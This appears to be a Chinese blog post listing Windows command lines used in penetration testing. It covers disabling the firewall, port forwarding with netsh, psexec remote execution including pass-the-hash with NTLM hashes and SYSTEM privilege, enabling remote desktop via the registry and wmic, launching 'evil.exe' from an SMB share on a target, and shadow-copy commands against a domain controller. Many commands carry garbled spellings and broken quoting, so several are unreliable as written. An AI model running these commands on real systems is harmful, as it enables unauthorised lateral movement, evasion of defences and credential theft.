美文网首页信息安全
windows环境渗透中常用系统命令

windows环境渗透中常用系统命令

作者: 南方小哥work | 来源:发表于2016-04-09 13:57 被阅读532次

    禁用windows防火墙
    netsh advfirewall set currentprofile state off
    netsh adbfirewall set all profiles state off

    本机windows端口转发(必须是管理员权限)不需要借助第三方软件进行转发
    启用转发
    netsh interface port proxy add v4tov4 listenport=3000 listenaddress=192.168.1.100 connectport=4000 connectaddress=192.168.1.120
    停止转发
    netsh interface portproxy delete v4tov4 listenport=3000 listenaddress=192.168.1.100

    psexec的一些用法

    执行远程主机上上的文件或者命令
    psexec /acceptula \targetip -u domain\user -p password -c -f \smbip \share\file.exe

    #注意,第一次执行psexec一定要带aaceptula参数,否则会弹出一个确认对话框,在命令行下是没办法结束的

    利用用户hash来登录远程主机并执行命令
    psexec /acceptula \ip -u Domain\user -p LM:NTLM cmd.exe /c dir c:\

    以system权限来执行远程命令
    psexec /accepteula \ip -s md.exe

    修改注册表开启windows终端服务
    reg add "HKEY LOCAL t1ACHINE\SYSTEH\CurentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

    wmi命令用法详解

    使用用户名密码通过smb来执行远程主机上的命令或者文件
    wmic /node: targetiP /user:domain\user /password:password process call create "\ smbiP \share\evil.exe”

    卸载软件
    wmic product get name /value # 获取软件名称
    wmic product where name=11XXX" call uninstall /nointeractive

    判定远程登录用户
    wmic /node:remotecomputer computersystern get username

    实时获取远程主机进程
    wmic /node:machinename process list brief /every:1

    开启远程rdp
    wmic /node:"machinename 4" path Win32_TerminalServiceSetting where
    AllowTSConnections=''O'' call SetAllowTSConnections ''1’'

    列举用户登录时长
    wmic netlogin where (name like "%adm%") get numberoflogons

    卷影拷贝服务
    wmic /node: DC IP /user:"DOI1AIN\user" /password:"P ASS 11 process call create "cmd /c vssadmin list shadows 2 &1 c:\temp\output.txt”

    相关文章

      网友评论

        本文标题:windows环境渗透中常用系统命令

        本文链接:https://www.haomeiwen.com/subject/zrqblttx.html